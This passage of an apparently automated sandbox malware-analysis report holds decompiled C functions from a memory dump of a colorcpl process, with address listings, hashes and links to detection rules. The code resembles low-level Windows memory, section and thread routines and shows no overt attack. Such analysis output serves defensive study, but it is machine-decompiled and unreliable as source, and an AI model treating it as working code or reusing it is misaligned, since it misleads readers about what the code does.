					_t226 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t238 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t238 + 0xc5));
						_t226 = _v48;
					}
					_t196 = _t195 |  *(_t238 + 0xb8);
					_t223 = _t222 |  *(_t238 + 0xbc);
					_t234 = _t234 &  *(_t238 + 0xb0);
					_t200 = _t200 &  *(_t238 + 0xb4);
					_v104 = _t196;
					_v76 = _t196;
					_v100 = _t223;
					_v72 = _t223;
					_v84 = _t234;
					_v80 = _t200;
				}
				_t155 = 0;
				if(_v105 == 0) {
					_v52 = 0;
					_t234 = 0;
					_t200 = 0;
					 *((intOrPtr*)(_t226 + 0x74)) = 0;
					goto L19;
				} else {
					_v52 = 1;
					goto L8;
				}
			}

0x04341059
0x04341063
0x04341069
0x0434106d
0x0434106f
0x04341076
0x0434107a
0x0434107e
0x04341088
0x04341093
0x04341097
0x0434109b
0x0434109b
0x0434109b
0x0434109d
0x0439f1b9
0x0439f1bc
0x0439f1bf
0x0439f1c3
0x0439f1c6
0x0439f1ca
0x0439f1ce
0x0439f1d1
0x0439f1d5
0x0439f1d9
0x0439f255
0x0439f255
0x0439f259
0x04341118
0x0434111c
0x0439f262
0x0439f262
0x0439f268
0x0439f26c
0x0439f26c
0x0439f270
0x00000000
0x00000000
0x0439f27e
0x0439f27f
0x0439f282
0x0439f289
0x00000000
0x00000000
0x00000000
0x0439f28b
0x0439f295
0x0439f29b
0x0439f29f
0x0439f2a3
0x0439f2a7
0x0439f2ab
0x0439f2b5
0x0439f2c0
0x0439f2c4
0x0439f2ca
0x0439f2d4
0x0439f2d8
0x0439f2dc
0x00000000
0x0439f2ed
0x0439f2ef
0x0439f2f2
0x0439f2f5
0x0439f2fc
0x0439f301
0x0439f303
0x0439f306
0x0439f30a
0x0439f30e
0x0439f312
0x00000000
0x00000000
0x0439f323
0x0439f327
0x0439f348
0x0439f34d
0x0439f351
0x0439f354
0x0439f357
0x0439f35c
0x00000000
0x00000000
0x0439f362
0x0439f366
0x0439f366
0x0439f36a
0x0439f378
0x0439f37b
0x0439f383
0x0439f392
0x0439f392
0x0439f3aa
0x0439f3af
0x0439f3b7
0x0439f3bd
0x0439f3ca
0x0439f3cd
0x0439f3d6
0x0439f3da
0x0439f3ed
0x0439f3f2
0x0439f3f2
0x0439f3f8
0x0439f3fb
0x0439f400
0x0439f404
0x0439f408
0x0439f40c
0x0434112a
0x0434112a
0x0434112d
0x04341133
0x04341153
0x04341159
0x04341159
0x04341163
0x04341164
0x04341165
0x04341170
0x04341170
0x0439f329
0x0439f32d
0x0439f32d
0x0439f32e
0x0439f331
0x0439f335
0x0439f339
0x00000000
0x0439f33e
0x0439f2dc
0x04341122
0x04341122
0x04341126
0x00000000
0x04341126
0x043410a3
0x043410a6
0x043410a8
0x043410ac
0x043410b3
0x0439f1e1
0x0439f1e5
0x0439f1e9
0x043410b9
0x043410b9
0x043410bc
0x043410c5
0x043410c7
0x043410c7
0x043410d3
0x043410d6
0x043410d9
0x043410dc
0x043410df
0x043410e3
0x043410e7
0x043410eb
0x043410eb
0x043410f6
0x043410fa
0x043410fe
0x0439f1fc
0x0439f200
0x0439f205
0x0439f20d
0x0439f211
0x0439f211
0x0439f215
0x0439f21b
0x0439f221
0x0439f227
0x0439f22d
0x0439f231
0x0439f235
0x0439f239
0x0439f23d
0x0439f241
0x0439f241
0x04341104
0x0434110a
0x0439f24a
0x0439f24e
0x0439f250
0x0439f252
0x00000000
0x04341110
0x04341110
0x00000000
0x04341110

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f4724374645420cae6496874106f1ec435a9b0ec7f9ba4f89757fb6449d46a
Instruction ID: 8f6d1c27ae6d9d8fbe0547700f9c401794b8405ed2ce41bec9d3f8ca9ab35d41
Opcode Fuzzy Hash: 98f4724374645420cae6496874106f1ec435a9b0ec7f9ba4f89757fb6449d46a
Instruction Fuzzy Hash: 46B111B56087808FD754CF28C480A6AFBF1BF88304F18596EE899D7352D731E885CB82

Uniqueness

Uniqueness Score: -1.00%

Function 043C55E0 Relevance: .2, Instructions: 246
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E043C55E0(void* _a4) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				void _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v108;
				void* _t84;
				signed char _t91;
				intOrPtr _t94;
				void* _t103;
				char* _t122;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				char* _t136;
				intOrPtr _t141;
				intOrPtr _t144;
				signed int _t145;
				signed int _t148;
				intOrPtr _t151;
				void* _t159;
				void* _t160;
				intOrPtr* _t161;

				_t159 = _a4;
				_push(4);
				_push(0x3000);
				_push(_t159);
				_push(0);
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_push( &_v8);
				_push(0xffffffff);
				_t141 = E04382B10();
				if(_t141 >= 0) {
					_t145 = 0xb;
					memcpy(_v8, _t159, _t145 << 2);
					_push(0);
					_push(0);
					_push(0);
					_push(0x1f0003);
					_push( &_v20);
					_t141 = E04382E30();
					if(_t141 < 0) {
						goto L27;
					}
					_t160 = _a4;
					_t91 =  *(_t160 + 4);
					_t148 = _t91 & 0x00000002;
					if((_t91 & 0x00000008) != 0) {
						_t148 = _t148 | 0x00000004;
					}
					_t141 = E043C5870(_t148 | 0x00000001, 0, 0, 0,  &_v108);
					if(_t141 != 0) {
						if(_t141 != 0x129) {
							 *((intOrPtr*)(_t160 + 0x1c)) = 0;
							 *((intOrPtr*)(_t160 + 0x20)) = 0;
							 *((intOrPtr*)(_t160 + 0x24)) = 0;
							 *((intOrPtr*)(_t160 + 0x28)) = 0;
							_t94 =  *((intOrPtr*)(_t160 + 0x10));
							if(_t94 != 0) {
								_push(0);
								_push(_t94);
								E04382A70();
							}
							goto L27;
						}
						_push(0);
						 *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) = 1;
						_push(_v16);
						E04382A70();
						_push(_v16);
						E04382A80();
						if(_v12 != 0) {
							_push(0);
							_push(0);
							_push(_v12);
							E043829D0();
							_push(_v12);
							E04382A80();
						}
						_t161 =  *((intOrPtr*)(_v8 + 8));
						_t103 = _v8;
						if(_t161 == 0) {
							if(( *(_t103 + 4) & 0x00000004) == 0) {
								_push(0);
								_push(0xfffffffe);
								E04384570();
							}
						} else {
							 *0x44391e0( *((intOrPtr*)(_t103 + 0xc)));
							 *_t161();
						}
						_push(0x8000);
						_v24 =  *_v8;
						_push( &_v24);
						_push( &_v8);
						_push(0xffffffff);
						_t141 = E04382B90();
						_push(_t141);
						_push(0xffffffff);
						L8:
						E04382C70();
						goto L27;
					}
					_t151 = _v104;
					_push(2);
					 *((intOrPtr*)(_t160 + 0x20)) = _v100;
					_push(0);
					 *((intOrPtr*)(_t160 + 0x24)) = _v96;
					_push(0x1f0003);
					 *((intOrPtr*)(_t160 + 0x28)) = _v92;
					_push( &_v16);
					_push(_t151);
					_push(_v20);
					 *((intOrPtr*)(_t160 + 0x1c)) = _t151;
					_push(0xffffffff);
					if(E04382D70() >= 0) {
						_push(0);
						_push(4);
						_t122 =  &_v16;
						_push(_t122);
						_push(_t122);
						_push(_v104);
						_t141 = E04382D50();
						if(_t141 < 0) {
							goto L7;
						}
						_t124 =  *((intOrPtr*)(_t160 + 0x18));
						if(_t124 == 0) {
							L15:
							_push(_v104);
							E04384160();
							_push(0);
							_push(0);
							_push(_v20);
							E043829D0();
							_t127 =  *((intOrPtr*)(_t160 + 0x10));
							_v28 = _t127;
							if(_t127 != 0) {
								_push(0);
								_t144 =  *((intOrPtr*)(_a4 + 0x14));
								_push(_t127);
								_t128 = E04382A70();
								_push(0);
								_push(0);
								_push(_t144);
								_v32 = _t128;
								E043829D0();
								_push(_v104);
								E04382A80();
								_push(_v100);
								E04382A80();
								_push(_v28);
								E04382A80();
								_push(_t144);
								E04382A80();
								_t141 = _v32;
							}
							goto L27;
						}
						_push(2);
						_push(0);
						_push(0x1f0003);
						_push( &_v12);
						_push(_v104);
						_push(_t124);
						_push(0xffffffff);
						_t141 = E04382D70();
						if(_t141 < 0) {
							goto L7;
						}
						if(( *(_t160 + 4) & 0x00000010) == 0) {
							_push( *((intOrPtr*)(_t160 + 0x18)));
							E04382A80();
						}
						_push(0);
						_push(4);
						_t136 =  &_v12;
						_push(_t136);
						_push(_t136);
						_push(_v104);
						_t141 = E04382D50();
						if(_t141 < 0) {
							goto L7;
						} else {
							goto L15;
						}
					}
					L7:
					_push(_t141);
					_push(_v104);
					goto L8;
				} else {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					L27:
					if(_v20 != 0) {
						_push(_v20);
						E04382A80();
					}
					_t84 = _v8;
					if(_t84 != 0) {
						_v24 =  *_t84;
						_push(0x8000);
						_push( &_v24);
						_push( &_v8);
						_push(0xffffffff);
						E04382B90();
					}
					return _t141;
				}
			}

0x043c55ea
0x043c55f0
0x043c55f2
0x043c55f7
0x043c55f8
0x043c55f9
0x043c55fc
0x043c55ff
0x043c5602
0x043c5608
0x043c5609
0x043c5610
0x043c5614
0x043c562a
0x043c562b
0x043c5633
0x043c5634
0x043c5635
0x043c5636
0x043c563b
0x043c5641
0x043c5645
0x00000000
0x00000000
0x043c564b
0x043c564e
0x043c5653
0x043c5658
0x043c565a
0x043c565a
0x043c566d
0x043c5671
0x043c5783
0x043c5812
0x043c5815
0x043c5818
0x043c581b
0x043c581e
0x043c5823
0x043c5825
0x043c5826
0x043c5827
0x043c5827
0x00000000
0x043c5823
0x043c578f
0x043c5793
0x043c579a
0x043c579b
0x043c57a3
0x043c57a4
0x043c57ac
0x043c57ae
0x043c57af
0x043c57b0
0x043c57b3
0x043c57b8
0x043c57bb
0x043c57bb
0x043c57c3
0x043c57c6
0x043c57cb
0x043c57e2
0x043c57e4
0x043c57e5
0x043c57e7
0x043c57e7
0x043c57cd
0x043c57d3
0x043c57d9
0x043c57d9
0x043c57ef
0x043c57f6
0x043c57fc
0x043c5800
0x043c5801
0x043c5808
0x043c580a
0x043c580b
0x043c56b0
0x043c56b0
0x00000000
0x043c56b0
0x043c567a
0x043c567d
0x043c567f
0x043c5685
0x043c5686
0x043c568c
0x043c5691
0x043c5697
0x043c5698
0x043c5699
0x043c569c
0x043c569f
0x043c56aa
0x043c56ba
0x043c56bb
0x043c56bd
0x043c56c0
0x043c56c1
0x043c56c2
0x043c56ca
0x043c56ce
0x00000000
0x00000000
0x043c56d0
0x043c56d5
0x043c571a
0x043c571a
0x043c571d
0x043c5722
0x043c5723
0x043c5724
0x043c5727
0x043c572c
0x043c572f
0x043c5734
0x043c5743
0x043c5745
0x043c5748
0x043c5749
0x043c574e
0x043c5750
0x043c5752
0x043c5753
0x043c5756
0x043c575b
0x043c575c
0x043c5761
0x043c5762
0x043c5767
0x043c576a
0x043c576f
0x043c5770
0x043c5775
0x043c5775
0x00000000
0x043c5734
0x043c56d7
0x043c56d9
0x043c56da
0x043c56e2
0x043c56e3
0x043c56e6
0x043c56e7
0x043c56ee
0x043c56f2
0x00000000
0x00000000
0x043c56f9
0x043c56fe
0x043c56ff
0x043c56ff
0x043c5704
0x043c5705
0x043c5707
0x043c570a
0x043c570b
0x043c570c
0x043c5714
0x043c5718
0x00000000
0x00000000
0x00000000
0x00000000
0x043c5718
0x043c56ac
0x043c56ac
0x043c56ad
0x00000000
0x043c5616
0x043c561b
0x043c561c
0x043c561d
0x043c561e
0x043c582c
0x043c5830
0x043c5832
0x043c5835
0x043c5835
0x043c583a
0x043c583f
0x043c5843
0x043c5849
0x043c584e
0x043c5852
0x043c5853
0x043c5855
0x043c5855
0x043c5860
0x043c5860

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 77ec9fda324c97707dad2cb83f78300fa7504d6fe2673c2956a1b90125137397
Instruction ID: 7d5c07ae12c0fe4b340b781c10d93048c65f489e7bda6ddf2f385a65a76e3270
Opcode Fuzzy Hash: 77ec9fda324c97707dad2cb83f78300fa7504d6fe2673c2956a1b90125137397
Instruction Fuzzy Hash: C4812B71A00719BEEB21EFA5CC84EAFBBF8EF48714F10156DE515A7290DA70BD008B54

Uniqueness

Uniqueness Score: -1.00%

Function 0440A6C0 Relevance: .2, Instructions: 222
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E0440A6C0(signed char* __ecx, signed int __edx, signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				void* __ebx;
				void* __esi;
				intOrPtr _t84;
				signed int _t91;
				signed int _t92;
				intOrPtr* _t104;
				char _t110;
				signed int _t112;
				char* _t113;
				char _t117;
				intOrPtr* _t135;
				signed int _t136;
				unsigned int _t139;
				signed int _t152;
				signed int _t158;
				signed char _t159;
				unsigned int _t171;
				signed int _t175;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed char* _t196;
				intOrPtr* _t202;

				_t135 = _a8;
				_t196 = __ecx;
				_t84 =  *((intOrPtr*)(_t135 + 0x10));
				_t190 = __edx;
				_v28 = __edx;
				_t171 =  *((intOrPtr*)(_t135 + 4)) + 0xfff >> 0xc;
				_v40 = __ecx;
				_t139 = _t84 + 0xfff >> 0xc;
				_v16 = _t139;
				_v16 = _v16 << 0xc;
				_v36 = _t171;
				_v32 = _t139;
				if(_v16 >= _t84) {
					__eflags = _t139 - _t171;
					if(_t139 > _t171) {
						L36:
						__eflags = _t190 & 0x02000000;
						if((_t190 & 0x02000000) != 0) {
							goto L1;
						}
						_t191 = E044099CA(_t196, _a4, _t135, _t190);
						L38:
						return _t191;
					}
					_v20 = __ecx[4];
					__eflags =  *__ecx >> 8 - 2;
					if( *__ecx >> 8 < 2) {
						L5:
						__eflags =  *(_t196 + 0xc) & 0x04000000;
						if(( *(_t196 + 0xc) & 0x04000000) != 0) {
							goto L36;
						} else {
							E04397B54(_t196, _t190);
							_t91 = _t196 + 0x44;
							__eflags =  *(_t91 + 4) & 0x00000001;
							_t136 =  *_t91;
							if(( *(_t91 + 4) & 0x00000001) != 0) {
								__eflags = _t136;
								if(_t136 == 0) {
									_t136 = 0;
									__eflags = 0;
								} else {
									_t136 = _t136 ^ _t91;
								}
							}
							_t92 = _a4;
							_t175 =  *(_t91 + 4) & 1;
							while(1) {
								__eflags = _t136;
								if(_t136 == 0) {
									break;
								}
								_t143 =  *(_t136 + 0xc) & 0xffff0000;
								__eflags = _t92 - ( *(_t136 + 0xc) & 0xffff0000);
								if(__eflags < 0) {
									_t143 =  *_t136;
									L15:
									__eflags = _t175;
									if(_t175 == 0) {
										L18:
										_t136 = _t143;
										continue;
									}
									__eflags = _t143;
									if(_t143 == 0) {
										goto L18;
									}
									_t136 = _t136 ^ _t143;
									continue;
								}
								if(__eflags <= 0) {
									break;
								}
								_t143 =  *(_t136 + 4);
								goto L15;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								_t192 =  *(_t136 + 0x10);
								_t29 = (1 << (_t192 >> 0x00000002 & 0x0000003f)) - 1; // 0x0
								_t202 = _v40;
								_v20 = ((_t192 >> 0x00000001 & 0x00000001) + (_t192 >> 0xc) << 0xc) - 1 + (1 << (_t192 >> 0x00000002 & 0x0000003f)) - (((_t192 >> 0x00000001 & 0x00000001) + (_t192 >> 0x0000000c) << 0x0000000c) - 0x00000001 + 1 & _t29);
								 *(_t136 + 0x10) = _t192 & 0x00000fff | _v32 << 0x0000000c;
								_t195 = _v28;
								 *(_t136 + 0xc) = (_v32 << 0xc) -  *((intOrPtr*)(_a8 + 0xc));
								E04397B8C(_t202, _v28, _a8);
								_t104 = _a8;
								__eflags =  *(_t104 + 8);
								if( *(_t104 + 8) == 0) {
									_t191 = _a4;
								} else {
									_t191 = _a4;
									E044085B0(_t191,  *_t104, _t202, _t191,  *((intOrPtr*)(_t104 + 0xc)), _t195);
								}
								_t152 = _v32;
								__eflags = _t152 - _v36;
								if(_t152 < _v36) {
									_push( *((intOrPtr*)(_t202 + 4)));
									_push( *_t202);
									_t110 = (( *(_t136 + 0x10) >> 0x00000001 & 0x00000001) + _t152 << 0xc) + _t191;
									_v12 = _t110;
									_v8 = _v20 - _t110 + _t191;
									_push(0x8000);
									E04408845( &_v12,  &_v8);
									_t112 = E04353C40();
									__eflags = _t112;
									if(_t112 == 0) {
										_t113 = 0x7ffe0388;
									} else {
										_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
									}
									__eflags =  *_t113;
									if( *_t113 != 0) {
										E043FDA30(_t136, _t202, _v12, _v8);
									}
									_v20 = _v20 - _v8;
									_t117 = _v16 + _t191;
									_t158 = _v12 - _t117;
									__eflags = _t158;
									_v12 = _t117;
									_v8 = _t158;
									if(_t158 != 0) {
										_push( *((intOrPtr*)(_t202 + 4)));
										_push( *_t202);
										_push(0x4000);
										E04408845( &_v12,  &_v8);
									}
									_t159 = _v20;
									asm("bsf ecx, ecx");
									_v40 = _t159;
									__eflags = _t159 - ( *(_t136 + 0x10) >> 0x00000002 & 0x0000003f);
									if(_t159 != ( *(_t136 + 0x10) >> 0x00000002 & 0x0000003f)) {
										E04397B54(_t202, _v28);
										_t75 = _t136 + 0x10;
										 *_t75 =  *(_t136 + 0x10) ^ (_v40 << 0x00000002 ^  *(_t136 + 0x10)) & 0x000000fc;
										__eflags =  *_t75;
										E04397B8C(_t202, _v28, _v40);
									}
									asm("lock xadd [eax], ecx");
									asm("lock xadd [eax], edx");
								}
							} else {
								E04397B8C(_t196, _t190, _t143);
								_t191 = _t190 | 0xffffffff;
							}
							goto L38;
						}
					}
					__eflags =  *__ecx & 0x00000006;
					if(( *__ecx & 0x00000006) == 0) {
						goto L36;
					}
					goto L5;
				}
				L1:
				_t191 = 0;
				goto L38;
			}

0x0440a6c9
0x0440a6cd
0x0440a6d0
0x0440a6d3
0x0440a6de
0x0440a6e1
0x0440a6ea
0x0440a6ed
0x0440a6f0
0x0440a6f3
0x0440a6f7
0x0440a6fa
0x0440a700
0x0440a709
0x0440a70b
0x0440a917
0x0440a917
0x0440a91d
0x00000000
0x00000000
0x0440a92f
0x0440a931
0x0440a937
0x0440a937
0x0440a714
0x0440a71c
0x0440a71e
0x0440a729
0x0440a729
0x0440a730
0x00000000
0x0440a736
0x0440a73a
0x0440a73f
0x0440a742
0x0440a746
0x0440a748
0x0440a74a
0x0440a74c
0x0440a752
0x0440a752
0x0440a74e
0x0440a74e
0x0440a74e
0x0440a74c
0x0440a758
0x0440a75b
0x0440a784
0x0440a784
0x0440a786
0x00000000
0x00000000
0x0440a763
0x0440a769
0x0440a76b
0x0440a774
0x0440a776
0x0440a776
0x0440a778
0x0440a782
0x0440a782
0x00000000
0x0440a782
0x0440a77a
0x0440a77c
0x00000000
0x00000000
0x0440a77e
0x00000000
0x0440a77e
0x0440a76d
0x00000000
0x00000000
0x0440a76f
0x00000000
0x0440a76f
0x0440a788
0x0440a78a
0x0440a79e
0x0440a7c5
0x0440a7d2
0x0440a7dc
0x0440a7ea
0x0440a7ed
0x0440a7fc
0x0440a800
0x0440a805
0x0440a808
0x0440a80c
0x0440a821
0x0440a80e
0x0440a814
0x0440a81a
0x0440a81a
0x0440a824
0x0440a827
0x0440a82a
0x0440a836
0x0440a83b
0x0440a848
0x0440a84c
0x0440a851
0x0440a857
0x0440a85c
0x0440a861
0x0440a866
0x0440a868
0x0440a87a
0x0440a86a
0x0440a873
0x0440a873
0x0440a87f
0x0440a882
0x0440a88c
0x0440a88c
0x0440a89a
0x0440a8a0
0x0440a8a2
0x0440a8a2
0x0440a8a4
0x0440a8a7
0x0440a8aa
0x0440a8ac
0x0440a8b2
0x0440a8b7
0x0440a8bc
0x0440a8bc
0x0440a8c1
0x0440a8c7
0x0440a8d0
0x0440a8d3
0x0440a8d5
0x0440a8dc
0x0440a8f4
0x0440a8f4
0x0440a8f4
0x0440a8fa
0x0440a8fa
0x0440a90a
0x0440a911
0x0440a911
0x0440a78c
0x0440a791
0x0440a796
0x0440a796
0x00000000
0x0440a78a
0x0440a730
0x0440a720
0x0440a723
0x00000000
0x00000000
0x00000000
0x0440a723
0x0440a702
0x0440a702
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
Instruction ID: 3b13939982ba1e2464dd2260702a74d98f706f00b4893677fbf9b0661be86f5e
Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
Instruction Fuzzy Hash: E4817F72B007099BDF18CF99C484AAEB7F2AF94314F15C57AD815AB394D774E912CB40

Uniqueness

Uniqueness Score: -1.00%

Function 043FB0AF Relevance: .2, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E043FB0AF(signed int __ecx, signed char __edx, signed int _a4, signed int _a8, void* _a12, signed int* _a16, short* _a20) {
				void* _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v36;
				signed int _t73;
				signed int _t77;
				void* _t86;
				void* _t91;
				signed int _t97;
				signed int _t101;
				signed int _t113;
				signed int _t114;
				signed int _t116;
				intOrPtr _t119;
				signed int _t122;
				intOrPtr _t124;
				signed char _t127;
				signed int _t129;
				void* _t130;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t134;
				intOrPtr _t139;
				void* _t140;
				signed int* _t141;
				short* _t142;
				signed int _t143;

				_t127 = __edx;
				_t140 = 0;
				_v12 = __edx;
				_v24 = _v24 & 0;
				_t113 = __ecx;
				_t116 = _a8;
				_t73 = 0;
				_v28 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_t137 = _a4;
				if(__edx != _t116) {
					if(__edx == 0 || _t116 == 0) {
						L53:
						_t114 = 0;
						goto L54;
					} else {
						_t142 = _a20;
						if(_t142 != 0) {
							 *_t142 = 0xffffffff;
						}
						if(_t127 != 2) {
							if(_t116 != 2) {
								if(_t127 != 1) {
									if(_t127 != 3 || _t116 != 1) {
										goto L52;
									} else {
										_t130 = 0x55;
										_t140 = E0433D818(_t116, _t130);
										if(_t140 == 0) {
											goto L53;
										}
										_v32 = _t140;
										_v36 = 0xaa0000;
										if(E04364F40(_a12,  &_v36) == 0) {
											goto L53;
										}
										_t131 =  *((intOrPtr*)(_t113 + 0x18));
										_t137 = _a4;
										if(_t131 == 0 || _t137 < 0) {
											L48:
											_t86 = 0;
											goto L49;
										} else {
											_t122 = _t137;
											if(_t122 >= ( *(_t131 + 6) & 0x0000ffff)) {
												goto L48;
											}
											_t86 =  *((intOrPtr*)(_t131 + 0x10)) +  *( *((intOrPtr*)(_t131 + 0xc)) + _t122 * 2) * 2;
											L49:
											if(_t86 == 0 || E043879A0(_v32, _t86) != 0) {
												goto L53;
											} else {
												_t114 = 1;
												L54:
												if(_t140 != 0) {
													E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t140);
												}
												goto L11;
											}
										}
									}
								}
								if(_t116 != 3) {
									goto L52;
								}
								_t132 =  *((intOrPtr*)(_t113 + 0x18));
								if(_t132 == 0) {
									L36:
									_t91 = 0;
									L37:
									if(_t91 == 0) {
										goto L52;
									}
									E04385050(_t116,  &_v36, _t91);
									if(E043656E0( &_v36,  &_v20) == 0) {
										goto L52;
									}
									_t137 = _a4;
									_t114 = _t113 & 0xffffff00 | _a4 == _v20;
									goto L11;
								}
								_t97 = _a12;
								if(_t97 < 0) {
									goto L36;
								}
								_t116 = _t97;
								if(_t116 >= ( *(_t132 + 6) & 0x0000ffff)) {
									goto L36;
								}
								_t91 =  *((intOrPtr*)(_t132 + 0x10)) + _t116 * 2;
								goto L37;
							}
							if(_t113 == 0) {
								goto L52;
							}
							_t101 = _a12;
							if(_t101 < 0) {
								goto L52;
							}
							_t124 =  *((intOrPtr*)(_t113 + 0x14));
							_v20 = _t101;
							if(_v20 >= ( *(_t124 + 6) & 0x0000ffff)) {
								goto L52;
							}
							_t137 = _a4;
							_v16 = _v20 * 0x1c +  *((intOrPtr*)(_t124 + 0xc));
							_t114 = E043FBB40(_t113, _v20 * 0x1c +  *((intOrPtr*)(_t124 + 0xc)), _t127, _a4);
							_t73 = _v16;
							if(_t114 == 0 || _t73 == 0) {
								_t127 = _v12;
								goto L13;
							} else {
								_t127 = _v12;
								if(_t142 == 0) {
									goto L13;
								}
								 *_t142 = _a12;
								goto L12;
							}
						} else {
							if(_t113 == 0 || _t137 < 0) {
								L52:
								_t140 = _v8;
								goto L53;
							} else {
								_t134 =  *((intOrPtr*)(_t113 + 0x14));
								_t143 = _t137;
								if(_t143 >= ( *(_t134 + 6) & 0x0000ffff)) {
									goto L52;
								}
								_v24 = _t143 * 0x1c +  *((intOrPtr*)(_t134 + 0xc));
								_t114 = E043FBB40(_t113, _t143 * 0x1c +  *((intOrPtr*)(_t134 + 0xc)), _t116, _a12);
								L11:
								_t127 = _v12;
								L12:
								_t73 = _v16;
								L13:
								_t141 = _a16;
								if(_t141 == 0) {
									L58:
									return _t114;
								}
								if(_t114 == 0) {
									 *_t141 =  *_t141 & 0x00000000;
									goto L58;
								}
								if(_t73 != 0) {
									L21:
									 *_t141 = _t73;
									goto L58;
								}
								_t73 = _v24;
								if(_t73 != 0) {
									goto L21;
								}
								 *_t141 =  *_t141 & _t73;
								_t139 = _v28;
								if(E04364EDF(_t139, _t127 & 0x000000ff, _t137,  &_v8) < 0) {
									goto L58;
								}
								_t77 = _v8;
								if(0 > _t77) {
									goto L58;
								}
								_t119 =  *((intOrPtr*)(_t139 + 0x14));
								_t129 = _t77;
								if(_t129 >= ( *(_t119 + 6) & 0x0000ffff)) {
									goto L58;
								}
								_t73 = _t129 * 0x1c +  *((intOrPtr*)(_t119 + 0xc));
								goto L21;
							}
						}
					}
				}
				_t114 = __ecx & 0xffffff00 | _t137 == _a12;
				goto L13;
			}

0x043fb0af
0x043fb0b9
0x043fb0bb
0x043fb0be
0x043fb0c1
0x043fb0c3
0x043fb0c6
0x043fb0c8
0x043fb0cb
0x043fb0ce
0x043fb0d2
0x043fb0d7
0x043fb0e4
0x043fb309
0x043fb309
0x00000000
0x043fb0f2
0x043fb0f2
0x043fb0f7
0x043fb0fc
0x043fb0fc
0x043fb102
0x043fb1b4
0x043fb224
0x043fb293
0x00000000
0x043fb29a
0x043fb29c
0x043fb2a2
0x043fb2a6
0x00000000
0x00000000
0x043fb2ab
0x043fb2b4
0x043fb2c2
0x00000000
0x00000000
0x043fb2c4
0x043fb2c7
0x043fb2cc
0x043fb2ed
0x043fb2ed
0x00000000
0x043fb2d3
0x043fb2d7
0x043fb2dc
0x00000000
0x00000000
0x043fb2e8
0x043fb2ef
0x043fb2f1
0x00000000
0x043fb302
0x043fb302
0x043fb30b
0x043fb30d
0x043fb31f
0x043fb31f
0x00000000
0x043fb30d
0x043fb2f1
0x043fb2cc
0x043fb293
0x043fb229
0x00000000
0x00000000
0x043fb22f
0x043fb234
0x043fb258
0x043fb258
0x043fb25a
0x043fb25c
0x00000000
0x00000000
0x043fb267
0x043fb27b
0x00000000
0x00000000
0x043fb281
0x043fb288
0x00000000
0x043fb288
0x043fb236
0x043fb23c
0x00000000
0x00000000
0x043fb23e
0x043fb247
0x00000000
0x00000000
0x043fb253
0x00000000
0x043fb253
0x043fb1b8
0x00000000
0x00000000
0x043fb1be
0x043fb1c4
0x00000000
0x00000000
0x043fb1ca
0x043fb1ce
0x043fb1d8
0x00000000
0x00000000
0x043fb1e2
0x043fb1ee
0x043fb1f6
0x043fb1f8
0x043fb1fd
0x043fb329
0x00000000
0x043fb20b
0x043fb20b
0x043fb210
0x00000000
0x00000000
0x043fb219
0x00000000
0x043fb219
0x043fb108
0x043fb10a
0x043fb306
0x043fb306
0x00000000
0x043fb119
0x043fb119
0x043fb11c
0x043fb125
0x00000000
0x00000000
0x043fb139
0x043fb141
0x043fb143
0x043fb143
0x043fb146
0x043fb146
0x043fb149
0x043fb149
0x043fb14e
0x043fb334
0x043fb33a
0x043fb33a
0x043fb156
0x043fb331
0x00000000
0x043fb331
0x043fb15e
0x043fb1aa
0x043fb1aa
0x00000000
0x043fb1aa
0x043fb160
0x043fb165
0x00000000
0x00000000
0x043fb167
0x043fb16e
0x043fb17d
0x00000000
0x00000000
